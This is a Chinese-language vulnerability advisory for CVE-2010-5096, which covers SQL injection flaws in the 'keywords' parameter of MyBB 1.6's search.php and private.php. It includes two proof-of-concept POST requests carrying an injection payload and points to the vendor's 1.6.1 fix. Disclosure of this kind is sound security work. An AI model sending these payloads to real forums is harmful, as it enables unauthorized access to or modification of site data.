发布日期：2010-12-23
更新日期：2010-12-24

受影响系统：

MyBB MyBB 1.6

不受影响系统：

MyBB MyBB 1.6.1

描述：

---

BUGTRAQ  ID: 45565
CVE ID: CVE-2010-5096

MyBB是一款流行的Web论坛程序。

MyBB在实现上存在多个输入验证漏洞，远程攻击者可利用这些漏洞控制应用程序、访问或修改数据或利用底层数据库中的潜在漏洞。

这些漏洞源于未正确地过滤/private.php和/search.php中的"keywords"参数。

<*来源：Aung Khant
  
  链接：http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-5096
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

=> /search.php

POST /mybb/search.php

action=do_search&forums=2&keywords='+or+'a'+'a&postthread=1


=> /private.php

POST /mybb/private.php

my_post_key=&keywords='+or+'a'+'a&quick_search=Search+PMs&allbox=Check+All&fromfid=0&f \
id=4&jumpto=4&action=do_stuff

建议：

---

厂商补丁：

MyBB
----
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.mybboard.com/

浏览次数：2140
严重程度：0（网友投票）